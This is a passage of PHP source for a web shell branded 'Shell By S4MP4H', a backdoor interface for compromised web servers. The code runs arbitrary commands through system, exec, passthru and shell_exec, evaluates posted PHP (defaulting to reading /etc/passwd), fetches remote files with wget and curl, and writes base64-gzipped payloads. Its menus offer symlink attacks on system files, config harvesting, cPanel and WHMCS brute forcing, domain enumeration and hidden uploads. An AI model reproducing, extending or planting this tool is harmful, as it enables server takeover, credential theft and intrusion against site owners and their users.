onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form7');\" /></form></td><td style=\"text-align:right;\">".ukuran($file)."</td><td style=\"text-align:center;width:126px;\">".$owner."</td><td style=\"text-align:center;\"><a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".substr(sprintf('%o', fileperms($file)),-4)."</a><form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\"><input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" /><input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($file)), -4)."\" /><input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" /><input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" /></form></td><td><center>".get_perms($file)."</center></td><td align='center'>".$is_writable."</td><td style=\"text-align:center;\"><a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form4');\">".date("Y-m-d H:i:s",@filemtime($file))."</a><form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form4\" class=\"sembunyi\" style=\"margin:0;padding:0;\"><input type=\"hidden\" name=\"oldtime\" value=\"".$file."\" style=\"margin:0;padding:0;\" /><input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newtime\" value=\"".date("Y-m-d H:i:s",@filemtime($file))."\" /><input class=\"inputzbut\" type=\"submit\" name=\"touch\" value=\"touch\" /><input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form4');\" /></form></td><td style=\"width:152px;\"><a href=\"?y=$pwd&edit=$full\">edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">ren</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form6');\">cp</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form7');\">mv</a> | <a href=\"?y=$pwd&delete=$full\">del</a> | <a href=\"?y=$pwd&dl=$full\">dl</a> / <a href=\"?y=$pwd&dlgzip=$full\">gz</a></td></tr>";
582$total_file++;
583}
584$buff .= "
585</tbody></table><table class='explore'><tfoot><tr><th id='thcheck'><input type=\"checkbox\" onclick=\"checkAlls(this)\" /></th><th colspan='6' style=\"padding:0px;\">
586<script language='javascript'>
587function checkAlls(bx){
588var cbs = document.getElementsByTagName('input');
589for(var i=0; i < cbs.length; i++){
590if(cbs[i].type == 'checkbox' && cbs[i].name != 'dis'){
591cbs[i].checked = bx.checked;
592var c = cbs[i].parentElement.parentElement;
593if(cbs[i].checked) c.className = 'cbox_selected';
594else c.className = '';
595}
596}
597total_selected();
598}
599function hilites(el){
600var c = el.parentElement.parentElement;
601if(el.checked) c.className = 'cbox_selected';
602else c.className = '';
603total_selected();
604}
605function total_selected(){
606var a = document.getElementsByName('file[]');
607var b = document.getElementById('total_selected');
608var c = 0;
609for(var i = 0;i<a.length;i++)
610if(a[i].checked) c++;
611if(c==0) b.innerHTML = 'Total : $total_file Files, $total_dir Directories';
612else b.innerHTML = 'Total : $total_file Files, $total_dir Directories ( Selected : '+c+' Items )';
613}
614</script>
615<input type='hidden' name='pwd' value='".$pwd."'/>
616<select name='selectedValue' class='inputz' style='width:100%;'>
617<option disabled selected id='total_selected'>Total : $total_file Files, $total_dir Directories</option>
618<option value='copy'>Copy</option>
619<option value='move'>Move</option>";
620if(class_exists('ZipArchive'))
621$buff .= "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
622if(!empty($_COOKIE['z']) && @count($_COOKIE['file']))
623$buff .= "<option value='paste' selected>Paste / Compress</option>";
624$buff .= "<option value='del'>Delete</option></select></th><th colspan='1' style='width:116px;padding:0px;'>";
625if(!empty($_COOKIE['z']) && @count($_COOKIE['file']) && (($_COOKIE['z'] == 'zip'))){
626$buff .= "<input type='text' class='inputz' style='width:100%;' name='nm' value='".date("Ymd_His").".".($_COOKIE['z'] == 'zip'?'zip':'tar.gz')."'/>";
627}
628else{
629$buff .= "<input type='text' class='inputz' style='width:100%;' value='----------------------------' disabled/>";
630}
631$buff .= "</th><th colspan='1' style='padding:0px;width:181px;'><button type='submit' class='inputzbut'>Submit</button><button type='reset' class='inputzbut' name='reset'>Reset</button><button type='button' class='inputzbut' name='reload' onclick='window.location.reload();'>Reload</button></th></tr></tfoot></form>
632</table>";
633$buff .= "
634<script language='javascript'>
635$(document).ready(function() {
636$('#search').freezeTable({
637'autoHeight' : false,
638'height' : 130,
639'scrollbarWidth': 15
640});
641});
642</script>
643";
644return $buff;
645}
646function ukuran($file){
647if($size = @filesize($file)){
648if($size <= 1024) return "$size b ";
649else{
650if($size <= 1024*1024) {
651$size = @round($size / 1024,2);;
652return "$size kb ";
653}
654else {
655$size = @round($size / 1024 / 1024,2);
656return "$size mb ";
657}
658}
659}
660else return "<center>???</center>";
661}
662function exe($cmd){
663if(function_exists('system')) {
664@ob_start();
665@system($cmd);
666$buff = @ob_get_contents();
667@ob_end_clean();
668return $buff;
669}
670elseif(function_exists('exec')) {
671@exec($cmd,$results);
672$buff = "";
673foreach($results as $result){
674$buff .= $result;
675}
676return $buff;
677}
678elseif(function_exists('passthru')) {
679@ob_start();
680@passthru($cmd);
681$buff = @ob_get_contents();
682@ob_end_clean();
683return $buff;
684}
685elseif(function_exists('shell_exec')){
686$buff = @shell_exec($cmd);
687return $buff;
688}
689}
690function tulis($file,$text){
691$textz = gzinflate(base64_decode($text));
692if($filez = @fopen($file,"w")){
693@fputs($filez,$textz);
694@fclose($file);
695}
696}
697function ambil($link,$file) {
698if($fp = @fopen($link,"r")){
699while(!feof($fp)) {
700$cont.= @fread($fp,1024);
701}
702@fclose($fp);
703$fp2 = @fopen($file,"w");
704@fwrite($fp2,$cont);
705@fclose($fp2);
706}
707}
708function which($pr){
709$path = exe("which $pr");
710if(!empty($path)) { return trim($path); } else { return trim($pr); }
711}
712function download($cmd,$url){
713$namafile = basename($url);
714switch($cmd) {
715case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break;
716case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break;
717case 'wfread' : ambil($wurl,$namafile);break;
718case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break;
719case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break;
720case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break;
721case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break;
722default: break;
723}
724return $namafile;
725}
726function get_perms($file) {
727if($mode=@fileperms($file)){
728$perms='';
729$perms .= ($mode & 00400) ? 'r' : '-';
730$perms .= ($mode & 00200) ? 'w' : '-';
731$perms .= ($mode & 00100) ? 'x' : '-';
732$perms .= ($mode & 00040) ? 'r' : '-';
733$perms .= ($mode & 00020) ? 'w' : '-';
734$perms .= ($mode & 00010) ? 'x' : '-';
735$perms .= ($mode & 00004) ? 'r' : '-';
736$perms .= ($mode & 00002) ? 'w' : '-';
737$perms .= ($mode & 00001) ? 'x' : '-';
738return $perms;
739}
740else return "??????????";
741}
742function clearspace($text){
743return str_replace(" ","_",$text);
744}
745?>
746<html><head><title>Shell By <? echo $xName; ?></title>
747<script type="text/javascript">
748function tukar(lama,baru){
749document.getElementById(lama).style.display = 'none';
750document.getElementById(baru).style.display = 'block';
751}
752</script>
753<style type="text/css">
754body{
755background:#000000;
756}
757a{
758text-decoration:none;
759}
760a:hover{
761border-bottom:1px solid <?php echo $color[0]; ?>;
762color:<?php echo $color[0]; ?>;
763}
764*{
765font-size:11px;
766font-family:Tahoma,Verdana,Arial;
767color:#ffffff;
768}
769#menu{
770background:#111111;
771margin-top:3px;
772margin-bottom:9px;
773}
774#menu a{
775float:left;
776padding:5px 6px;
777letter-spacing:2px;
778background:#222222;
779margin:0.5px;
780}
781#menu a:hover{
782background:#191919;
783border-bottom:0px;
784}
785#menu ul{
786margin:0;
787padding:0;
788float:left;
789}
790#menu ul ul{
791position:absolute;
792top:24px;
793left:-990em;
794width:61px;
795}
796#menu ul ul a{
797display:block;
798}
799#menu li{
800position:relative;
801display:block;
802float:left;
803}
804#menu li:hover
805{
806cursor:pointer;
807}
808#menu li:hover>ul{
809left:1px;
810}
811#menu li:hover>ul a:hover{
812width:47px;
813background:#191919;
814}
815#menu li li{
816background:#222222;
817width:100%;
818margin-top:1px;
819}
820#menu li li a{
821margin-top:1px;
822}
823#menu ul ul ul{
824position:absolute;
825top:-1px;
826left:-990em;
827width:125px;
828}
829#menu ul ul ul a{
830display:block;
831}
832#menu li li:hover>ul{
833left:61px;
834border-left:1px solid #333333;
835}
836#menu li li:hover>ul a:hover{
837width:110px;
838background:#191919;
839}
840.tabnet{
841margin:15px auto 0 auto;
842border:1px solid #333333;
843}
844.main{
845width:100%;
846}
847.gaya{
848color:<?php echo $color[0]; ?>;
849}
850.guyu{
851color:#888888;
852}
853.normal{
854color:#ffffff;
855}
856.link{
857color:<?php echo $color[0]; ?>;
858text-decoration:none;
859}
860.link:hover{
861color:<?php echo $color[0]; ?>;
862border-bottom:1px solid <?php echo $color[0]; ?>;
863}
864.inputz{
865background:#111111;
866border:0;
867padding:2px;
868border-bottom:1px solid #222222;
869border-top:1px solid #222222;
870}
871.inputzbut{
872background:#111111;
873color:#ffffff;
874margin:0 4px;
875border:1px solid #444444;
876}
877.inputz:hover, .inputzbut:hover{
878border-bottom:1px solid <?php echo $color[0]; ?>;
879border-top:1px solid <?php echo $color[0]; ?>;
880}
881.output{
882margin:auto;
883border:1px solid <?php echo $color[0]; ?>;
884width:100%;
885height:400px;
886background:#000000;
887padding:0 2px;
888}
889.outputz{
890margin:auto;
891width:500px;
892border:1px solid <?php echo $color[0]; ?>;
893background:#000000;
894padding:0 2px;
895}
896.head_info{
897padding: 0 4px;
898background-color:#111111;
899border-bottom:1px solid <?php echo $color[0]; ?>;
900border-top:1px solid <?php echo $color[0]; ?>;
901}
902.s4mp4h{
903font-size:65px;
904padding:0;
905color:#ffffff;
906text-shadow: <?php echo $color[0]; ?> 0.0em 0.0em 0.2em;
907}
908.s4mp4h_tbl{
909text-align:center;
910margin:0 4px 0 0;
911padding:0 4px 0 0;
912border-right:1px solid #333333;
913}
914th{
915background:#191919;
916border-bottom:1px solid #333333;
917font-weight:normal;
918}
919.explore, .cmdbox{
920width:100%;
921}
922.explore a{
923text-decoration:none;
924}
925.explore td{
926border-bottom:1px solid #333333;
927padding:0 5px;
928line-height:21px;
929}
930.explore th{
931padding:4px 8px;
932font-weight:normal;
933border-bottom:1px solid <?php echo $color[0]; ?>;
934}
935.explore th:hover{
936border-bottom:1px solid <?php echo $color[0]; ?>;
937}
938.explore tr:hover{
939background:<?php echo $color[1]; ?>;
940}
941.viewfile{
942background:#EDECEB;
943color:#000000;
944margin:4px 2px;
945padding:8px;
946}
947.sembunyi{
948display:none;
949padding:0;margin:0;
950}
951.sym th{
952border-bottom:1px solid <?php echo $color[0]; ?>;
953padding:3px;
954}
955.sym tr:hover{
956background:<?php echo $color[1]; ?>;
957}
958.footer{
959background:#111111;
960border:0;
961padding:4px;
962border-bottom:1px solid <?php echo $color[0]; ?>;
963border-top:1px solid <?php echo $color[0]; ?>;
964}
965.schemabox{
966background-color:<?php echo $color[0]; ?>;
967border-radius:2px;
968}
969.tab{
970width:100%;
971}
972.tub{
973width:100%;
974}
975.tub th{
976border-bottom:1px solid <?php echo $color[0]; ?>;
977padding:3px;
978}
979.tub tr:hover{
980background:<?php echo $color[1]; ?>;
981}
982.tub td{
983border-bottom:1px solid #333333;
984padding-left:3px;
985}
986#maininfo{
987padding:5px;
988margin-top:10px;
989margin-left:2px;
990margin-right:2px;
991background:#191919;
992}
993#maininfo a{
994color:<?php echo $color[0]; ?>;
995}
996textarea{
997background:#000000;
998border:1px solid #444444;
999}
1000textarea:hover{
1001border:1px solid <?php echo $color[0]; ?>;
1002}
1003.top{
1004background:#111111;
1005border:1px solid <?php echo $color[0]; ?>;
1006}
1007.tb{
1008background:#222222;
1009border:1px solid <?php echo $color[0]; ?>;
1010}
1011.tb:hover{
1012color:<?php echo $color[0]; ?>;
1013}
1014#thcheck{
1015width:25px;
1016padding:0px;
1017text-align:center;
1018}
1019.cbox_selected{
1020background-color:<?php echo $color[2]; ?>;
1021}
1022.phpinfo{
1023margin-top:3px;
1024}
1025.phpinfo table{
1026width:100%;
1027float:left;
1028}
1029.phpinfo td{
1030background:#111111;
1031color:#FFFFFF;
1032padding-left:5;
1033}
1034.phpinfo th{
1035background:#191919;
1036border-bottom:1px solid <?php echo $color[0]; ?>;
1037font-weight:normal;
1038}
1039.phpinfo h1, .phpinfo h2{
1040background:#222222;
1041padding:4px 6px;
1042margin:2px;
1043}
1044.phpinfo hr{
1045border:0;
1046color:<?php echo $color[0]; ?>;
1047background-color:<?php echo $color[0]; ?>;
1048height:1px;
1049}
1050.phpinfo br{
1051margin:-10px;
1052}
1053.hp{
1054background:#191919;
1055margin:-1px;
1056line-height:18px;
1057text-align:center;
1058}
1059.tooltip {
1060display:none;
1061position:absolute;
1062border:1px solid <?php echo $color[0]; ?>;
1063background-color:#111111;
1064padding:7px;
1065color:#FFFFFF;
1066}
1067.no:hover{
1068text-decoration:none;
1069border:none;
1070}
1071#spoiler{
1072margin-left:2px;
1073margin-right:2px;
1074margin-bottom:-11px;
1075background-color:#000000;
1076border:1px solid <?php echo $color[0]; ?>;
1077}
1078</style>
1079<script src="http://syntax-errorz.googlecode.com/svn/trunk/jquery.min.js" type="text/javascript"></script>
1080<script type="text/javascript">
1081$(document).ready(function(){
1082$("#go_search").keyup(function(){
1083if( $(this).val() != "")
1084{
1085$("#search tbody>tr").hide();
1086$("#search td:contains-ci('" + $(this).val() + "')").parent("tr").show();
1087}
1088else
1089{
1090$("#search tbody>tr").show();
1091}
1092});
1093});
1094$.extend($.expr[":"],
1095{
1096"contains-ci": function(elem, i, match, array)
1097{
1098return (elem.textContent || elem.innerText || $(elem).text() || "").toLowerCase().indexOf((match[3] || "").toLowerCase()) >= 0;
1099}
1100});
1101</script>
1102<script type="text/javascript">
1103$(document).ready(function() {
1104$('.tip').hover(function(){
1105var title = $(this).attr('title');
1106$(this).data('tipText', title).removeAttr('title');
1107$('<p class="tooltip"></p>')
1108.text(title)
1109.appendTo('body')
1110.fadeIn('slow');
1111}, function() {
1112$(this).attr('title', $(this).data('tipText'));
1113$('.tooltip').remove();
1114}).mousemove(function(e) {
1115var mousex = e.pageX + 15;
1116var mousey = e.pageY + 15;
1117$('.tooltip')
1118.css({ top: mousey, left: mousex })
1119});
1120});
1121</script>
1122</head>
1123<body onLoad="document.getElementById('cmd').focus();"><div class="main"><div class="head_info">
1124<span style="float:right;margin-bottom:-25px;-webkit-margin-before:-2px;-webkit-margin-end:-2px;">
1125<form method="get" style="margin-right:-4px;margin-top:-1px;">
1126<select class="top" name="x">
1127<option value="none" selected>Style</option>
1128<option value="green">Green</option>
1129<option value="red">Red</option>
1130<option value="blue">Blue</option>
1131<option value="yellow">Yellow</option>
1132<option value="cyan">Cyan</option>
1133<option value="pink">Pink</option>
1134</select><button type="submit" class="tb" style="margin-left:-3px;">Go !</button>
1135</form>
1136</span><table ><tr><td><table class="s4mp4h_tbl"><tr><td><a href="<?php echo $_SERVER['PHP_SELF']; ?>"><span class="s4mp4h tip" title="Shell By S4MP4H"><? echo $xName; ?></span></a></td></tr><tr><td><b>[ Shell By <span class="gaya"><? echo $xName; ?></span> ]</b></td></tr></table></td><td><?php echo $buff; ?></td></tr></table><span style='float:right;margin-top:-16px;margin-right:-4px;-webkit-margin-before:-18px;-webkit-margin-end:-6px;'><button class="tb" onclick="location.href='?x=pass';">Password</button></span></div>
1137<div id="menu">
1138<ul class="menu">
1139<a href="?<?php echo "y=".$pwd; ?>">Explore</a>
1140<a href="?<?php echo "y=".$pwd; ?>&x=phpinfo">Info</a>
1141<a href="?<?php echo "y=".$pwd; ?>&x=domain">Domain</a>
1142<a href="?<?php echo "y=".$pwd; ?>&x=bypass">Bypass</a>
1143<li>
1144<a>Command</a>
1145<ul style="padding-right:12px;">
1146<li style="padding-right:12px;">
1147<a style="padding-right:18px;" href="?<?php echo "y=".$pwd; ?>&x=shell">Exec</a>
1148</li>
1149<li style="padding-right:12px;">
1150<a style="padding-right:18px;" href="?<?php echo "y=".$pwd; ?>&x=php">Eval</a>
1151</li>
1152</ul>
1153</li>
1154<li>
1155<a>Jumping</a>
1156<ul style="padding-right:4px;">
1157<li style="padding-right:4px;">
1158<a style="padding-right:10px;">Server</a>
1159<ul style="margin-left:4px;">
1160<li>
1161<a href="?<?php echo "y=".$pwd; ?>&x=jumping">Default</a>
1162</li>
1163<li>
1164<a href="?<?php echo "y=".$pwd; ?>&x=jumpings">Path</a>
1165</li>
1166</ul>
1167</li>
1168</ul>
1169</li>
1170<li>
1171<a>Symlink</a>
1172<ul>
1173<li>
1174<a>Server</a>
1175<ul>
1176<li>
1177<a href="?<?php echo "y=".$pwd; ?>&x=symlink">/etc/named.conf</a>
1178</li>
1179<li>
1180<a href="?<?php echo "y=".$pwd; ?>&x=symlinks">/etc/passwd</a>
1181</li>
1182<li>
1183<a href="?<?php echo "y=".$pwd; ?>&x=symlinkss">Path</a>
1184</li>
1185</ul>
1186</li>
1187<li>
1188<a>Config</a>
1189<ul>
1190<li>
1191<a href="?<?php echo "y=".$pwd; ?>&x=config">PHP</a>
1192</li>
1193<li>
1194<a href="?<?php echo "y=".$pwd; ?>&x=configs">Perl</a>
1195</li>
1196<li>
1197<a href="?<?php echo "y=".$pwd; ?>&x=configss">Manual</a>
1198</li>
1199<li>
1200<a href="?<?php echo "y=".$pwd; ?>&x=configsss">Path</a>
1201</li>
1202</ul>
1203</li>
1204<li>
1205<a href="?<?php echo "y=".$pwd; ?>&x=cms">Cms</a>
1206</li>
1207<li>
1208<a href="?<?php echo "y=".$pwd; ?>&x=port">Port</a>
1209</li>
1210</ul>
1211</li>
1212<li>
1213<a>Database</a>
1214<ul style="padding-right:13px;">
1215<li style="padding-right:13px;">
1216<a style="padding-right:19px;">Mysql</a>
1217<ul style="margin-left:13px;">
1218<li>
1219<a href="?<?php echo "y=".$pwd; ?>&x=sql">Type 1</a>
1220</li>
1221<li>
1222<a href="?<?php echo "y=".$pwd; ?>&x=mysql">Type 2</a>
1223</li>
1224</ul>
1225</li>
1226</ul>
1227</li>
1228<a href="?<?php echo "y=".$pwd; ?>&x=netsploit">Netsploit</a>
1229<a href="?<?php echo "y=".$pwd; ?>&x=processes">Process</a>
1230<li>
1231<a>Options</a>
1232<ul style="padding-right:2px;">
1233<li style="padding-right:2px;">
1234<a style="padding-right:8px;">Brute</a>
1235<ul style="margin-left:2px;">
1236<li>
1237<a href="?<?php echo "y=".$pwd; ?>&x=cpanel">Cpanel</a>
1238</li>
1239<li>
1240<a href="?<?php echo "y=".$pwd; ?>&x=whmcs">Whmcs</a>
1241</li>
1242</ul>
1243</li>
1244<li style="padding-right:2px;">
1245<a style="padding-right:8px;" href="?<?php echo "y=".$pwd; ?>&x=ins">Install</a>
1246</li>
1247<li style="padding-right:2px;">
1248<a style="padding-right:8px;" href="?<?php echo "y=".$pwd; ?>&x=scan">Scan</a>
1249</li>
1250<li style="padding-right:2px;">
1251<a style="padding-right:8px;" href="?<?php echo "y=".$pwd; ?>&x=mail">Mail</a>
1252</li>
1253</ul>
1254</li>
1255<li>
1256<a>Uploads</a>
1257<ul style="padding-right:3px;">
1258<li style="padding-right:3px;">
1259<a style="padding-right:9px;" href="?<?php echo "y=".$pwd; ?>&x=upload">Normal</a>
1260</li>
1261<li style="padding-right:3px;">
1262<a style="padding-right:9px;" href="#" onclick="if(document.getElementById('spoiler') .style.display=='none') {document.getElementById('spoiler') .style.display=''}else{document.getElementById('spoiler') .style.display='none'}">Hidden</a>
1263</li>
1264</ul>
1265</li>
1266<a href="?<?php echo "y=".$pwd;?>&x=logout">Logout</a>
1267</ul>
1268</div>
1269<div><br/></div>
1270<?php if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?>
1271<form action="?y=<?php echo $pwd; ?>&x=php" method="post"><br/><table class="cmdbox"><tr><td><textarea class="output" name="cmd" id="cmd">
1272<?php
1273if(isset($_POST['submitcmd'])) {
1274echo eval(magicboom($_POST['cmd']));
1275}
1276else echo "echo file_get_contents('/etc/passwd');";
1277?>
1278</textarea><tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form></table></form>
1279<?php
1280}
1281elseif(isset($_GET['x']) && ($_GET['x']=='pass')){
1282echo "<form action='?y=".$pwd."&x=pass' method='post'><table class='tabnet'><tr><th colspan='2'>Change Password</th></tr><tr><td style='width:100px;'>New password</td><td><input style='width:100%;' class='inputz' type='password' name='newpass' value='' /></td></tr><tr><td style='width:100px;'>Confirm password</td><td><input style='width:100%;' class='inputz' type='password' name='newpassx' value='' /></td></tr><tr><th colspan='2'><input type='submit' name='submitnewpass' class='inputzbut' value='Go !' /><input type='hidden' name='x' value='pass' /></th></tr></table></form>
1283<center>";
1284if(isset($_POST['submitnewpass'])){
1285$newpass = isset($_POST['newpass'])? trim($_POST['newpass']):"";
1286$newpassx = isset($_POST['newpassx'])? trim($_POST['newpassx']):"";
1287if(empty($newpass) || empty($newpassx)){
1288echo "<span class='guyu'>Give your new password to both fields</span>";
1289}
1290elseif($newpass != $newpassx){
1291echo "<span class='guyu'>Password does not match</span>";
1292}
1293else{
1294if(changepass($newpass)){
1295echo "<span class='gaya'>Password changed</span>";
1296}
1297else echo "<span class='guyu'>Unable to change password</span>";
1298}
1299}
1300echo "</center>";
1301}
1302elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){
1303@ini_set('output_buffering',0);
1304@ob_start();
1305@eval("phpinfo();");
1306$buff = @ob_get_contents();
1307@ob_end_clean();
1308$awal = strpos($buff,"<body>")+6;
1309$akhir = strpos($buff,"</body>");
1310echo "<br/><div class='phpinfo'>".substr($buff,$awal,$akhir-$awal)."</div><div style='margin-bottom:-15px;'> </div>";
1311}
1312elseif(isset($_GET['x']) && ($_GET['x'] == 'domain')){
1313?>
1314<form action="?y=<?php echo $pwd; ?>&x=domain" method="post">
1315<?php
1316echo "<br/><center><div class='sym'>";
1317$file = @implode(@file("/etc/named.conf"));
1318if(!$file){ die("[Domain] : <span class='guyu'>Can't Read -> [ /etc/named.conf ]</span>"); }
1319preg_match_all("#named/(.*?).db#",$file ,$r);
1320$domains = array_unique($r[1]);
1321{
1322$total = 0;
1323$no = 1;
1324echo "<table border='1' bordercolor='#333333' width='400' cellpadding='1' cellspacing='0' class='sortable'>
1325<thead><th style='width:40px;padding:0px;'>No</th><th style='width:100px;padding:0px;'>Users</th><th>Domains</th><th style='width:50px;padding:0px;'>Open</th></thead><tbody>";
1326foreach($domains as $domain){
1327$user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
1328echo "<tr><td align='center'>".$no++."</td><td>".$user['name']."</td><td><a href='http://".$domain."/' class='gaya' target='_blank'>".$domain."</td><td align='center'><a href='http://".$domain."/' class='gaya' target='_blank'>Open</td></tr>";
1329$total++;
1330}
1331echo "</tbody><tfoot><th>Totals</th><th colspan='3'>Founded ".$total." Domains</th><tfoot></table>";
1332}
1333echo "</div></center>";
1334}
1335elseif(isset($_GET['x']) && ($_GET['x'] == 'scan'))
1336{
1337if(isset($_POST['Submit'])){
1338$ceks = array('base64_decode','system','passthru','popen','exec','shell_exec','eval','move_uploaded_file');
1339foreach($ceks as $ceker){
1340if($_POST[$ceker]<>""){
1341$six.=$_POST[$ceker].".";
1342}
1343}
1344$cek = explode('.', $six);
1345function ListFiles($dir) {
1346if($dh = opendir($dir)) {
1347$files = Array();
1348$inner_files = Array();
1349while($file = readdir($dh)) {
1350if($file != "." && $file != "..") {
1351if(is_dir($dir . "/" . $file)) {
1352$inner_files = ListFiles($dir . "/" . $file);
1353if(is_array($inner_files)) $files = array_merge($files, $inner_files);
1354} else {
1355array_push($files, $dir . "/" . $file);
1356}
1357}
1358}
1359closedir($dh);
1360return $files;
1361}
1362}
1363?>
1364<br/><center>
1365<table class="explore">
1366<form action="" method="post">[Scan] : <span class="gaya">Successfull</span> <input type="submit" class="inputzbut" value="Rescan"></form><br/>
1367<tr>
1368<th align="center" width="15">No</th>
1369<th align="center" width="90">Scan Type</th>
1370<th align="center">File Location</th>
1371<th align="center" width="35">Chmod</th>
1372<th align="center" width="60">Perms</th>
1373<th align="center" width="50">Writable</th>
1374<th align="center" width="100">Modified</th>
1375<th align="center" width="60">File Size</th>
1376<th align="center" width="100">Actions</th>
1377</tr><br/>
1378<?php
1379$target=$_SERVER['DOCUMENT_ROOT'];
1380$i = 0;
1381foreach (ListFiles($target) as $key=>$file){
1382$nFile = substr($file, -4, 4);
1383if($nFile == ".php"){
1384if($file==$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF']){
1385}else{
1386$ops = @file_get_contents($file);
1387$op=strtolower($ops);
1388$arr = array('c99' => 'c99', 'r57' => 'r57', 's4mp4h' => 's4mp4h', 'wso' => 'wso');
1389$sis=0;
1390if($op)
1391$size = filesize($file);
1392$last_modified = filemtime($file);
1393$last=date("Y-m-d H:i:s", $last_modified);
1394$filn = basename($file);
1395$is_writable = is_writable($file)?"YES":"NO";
1396foreach($arr as $key => $val) {
1397if(@preg_match("/$key/", $op)) {
1398 $sis="1";
1399 $i++;
1400?>
1401<tr onmouseover="mover(this)" onmouseout="mout(this)">
1402<td align="center"><font color="red"><?=$i?></font></td>
1403<td align="center"><font color="red"><?=$val?></font></td>
1404<td align="left">
1405<a href="?view=<?=$file?>&bug=<?=$val?>" target="_blank" id="<?=clearspace($filn)?>_link"><?=$file?></a><form action="" method="post" id="<?=clearspace($filn)?>_form" class="sembunyi" style="margin:0;padding:0;"><input type="hidden" name="oldname" value="<?=$filn?>" style="margin:0;padding:0;" /><input class="inputz" style="width:200px;" type="text" name="newname" value="<?=$filn?>" /><input class="inputzbut" type="submit" name="rename" value="rename" /><input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('<?=clearspace($filn)?>_link','<?=clearspace($filn)?>_form');" /></form>
1406</td>
1407<td align="center"><?=substr(sprintf('%o', fileperms($file)),-4)?></td>
1408<td align="center"><?=get_perms($file)?></td>
1409<td align="center"><?=$is_writable?></td>
1410<td align="center"><font color="red"><?=$last?></font></td>
1411<td align="right"><font color="red"><?=$size?> byte</font></td>
1412<td align="center"><a href="?edit=<?=$file?>&bug=<?=$val?>" target="_blank">edit</a> | <a href="javascript:tukar('<?=clearspace($filn)?>_link','<?=clearspace($filn)?>_form');">ren</a> | <a href="?delete=<?=$file?>&bug=<?=$val?>" target="_blank">del</a> | <a href="?dl=<?=$file?>&bug=<?=$val?>">down</a>
1413</td>
1414</tr>
1415<?php
1416}
1417}
1418if($sis<>"1"){
1419if((@preg_match("/system\((.*?)\)/", $op))&&(@preg_match("/<pre>/", $op))&&(@preg_match("/empty\((.*?)\)/", $op))) {
1420 $sis="2";
1421 $i++;
1422 $val="hidden shell";
1423?>
1424<tr onmouseover="mover(this)" onmouseout="mout(this)">
1425<td align="center"><font color="blue"><?=$i?></font></td>
1426<td align="center"><font color="blue"><?=$val?></font></td>
1427<td align="left">
1428<a href="?view=<?=$file?>&bug=<?=$val?>" target="_blank" id="<?=clearspace($filn)?>_link"><?=$file?></a><form action="" method="post" id="<?=clearspace($filn)?>_form" class="sembunyi" style="margin:0;padding:0;"><input type="hidden" name="oldname" value="<?=$filn?>" style="margin:0;padding:0;" /><input class="inputz" style="width:200px;" type="text" name="newname" value="<?=$filn?>" /><input class="inputzbut" type="submit" name="rename" value="rename" /><input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('<?=clearspace($filn)?>_link','<?=clearspace($filn)?>_form');" /></form>
1429</td>
1430<td align="center"><?=substr(sprintf('%o', fileperms($file)),-4)?></td>
1431<td align="center"><?=get_perms($file)?></td>
1432<td align="center"><?=$is_writable?></td>
1433<td align="center"><font color="blue"><?=$last?></font></td>
1434<td align="right"><font color="blue"><?=$size?> byte</font></td>
1435<td align="center"><a href="?edit=<?=$file?>&bug=<?=$val?>" target="_blank">edit</a> | <a href="javascript:tukar('<?=clearspace($filn)?>_link','<?=clearspace($filn)?>_form');">ren</a> | <a href="?delete=<?=$file?>&bug=<?=$val?>" target="_blank">del</a> | <a href="?dl=<?=$file?>&bug=<?=$val?>">down</a>
1436</td>
1437</tr>
1438<?php
1439}
1440}
1441if($sis=="0"){
1442foreach($cek as $bugs) {
1443if ($bugs<>""){
1444if(@preg_match("/$bugs\((.*?)\)/", $op)) {
1445 $i++;
1446?>
1447<tr onmouseover="mover(this)" onmouseout="mout(this)">
1448<td align="center"><?=$i?></td>
1449<td align="center"><?=$bugs?></td>
1450<td align="left">
1451<a href="?view=<?=$file?>&bug=<?=$val?>" target="_blank" id="<?=clearspace($filn)?>_link"><?=$file?></a><form action="" method="post" id="<?=clearspace($filn)?>_form" class="sembunyi" style="margin:0;padding:0;"><input type="hidden" name="oldname" value="<?=$filn?>" style="margin:0;padding:0;" /><input class="inputz" style="width:200px;" type="text" name="newname" value="<?=$filn?>" /><input class="inputzbut" type="submit" name="rename" value="rename" /><input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('<?=clearspace($filn)?>_link','<?=clearspace($filn)?>_form');" /></form>
1452</td>
1453<td align="center"><?=substr(sprintf('%o', fileperms($file)),-4)?></td>
1454<td align="center"><?=get_perms($file)?></td>
1455<td align="center"><?=$is_writable?></td>
